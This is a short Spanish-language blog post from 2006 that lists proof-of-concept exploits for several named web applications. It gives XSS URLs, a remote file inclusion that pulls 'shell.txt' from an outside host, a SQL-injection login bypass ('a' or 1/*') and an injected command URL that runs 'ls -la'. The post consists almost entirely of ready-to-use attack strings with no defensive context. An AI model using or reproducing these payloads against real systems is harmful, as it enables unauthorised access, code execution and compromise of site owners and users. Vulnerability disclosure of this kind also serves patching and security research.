ecoestadistica.com

viernes, enero 13, 2006

Vulnerabilidades...

H-Sphere Security Vulnerability

-Vulnerabilidad
H-Sphere Hosting Control Panel XSS

-Vendedor
Positive Software (www.psoft.net)

-Sistema Afectado
* H-Sphere (<= 2.4.3 Patch 8) Prueba de Concepto

http://cp.example.com/psoft/servlet/psoft.hsphere.CP?action=login&login=[XSS]

-------------------------------------------------------------

Phpauction version 2.5 remote file inclusion

Prueba de concepto:

/includes/stats.inc.php?prefix=Http://victim.com/shell.txt? ------------------------------------------------------------

Wordcircle Authentication Bypass

Prueba de Concepto
Login Page:
http://host/index.php? a=login
Enter your email address: any
Enter your password: a' or 1/*

------------------------------------------------------------

Light Weight Calendar PHP Code Execution

Prueba de Concepto

Ejemplo de Codigo PHP ejecucion

http://host/lwc/index.php? stam=1928504&date=20050901);% 20echo%20(% 60ls%20-la% 60&View=month

------------------------------------------------------------

AlstraSoft Template Seller Pro XSS

Prueba de Concepto

http://vicktimhost/template/fullview.php?tempid=[XSS] ------------------------------------------------------------

Domain Trader XSS

Prueba de Concepto

http://domaintrader.smartscript.net/catalog.php?id=[XSS]

------------------------------------------------------------

DCP Portal XSS

Prueba de Concepto

http://vicktimhost/calendar.php?show=full_month&s=1&submit=GO&day=[XSS] http://vicktimhost/search.php--> escriba este codigo--> <> alert('XSS');< / sc rip t>

0 Comments:

Publicar un comentario

Links to this post:

Crear un vínculo

<< Home

ecoestadistica.com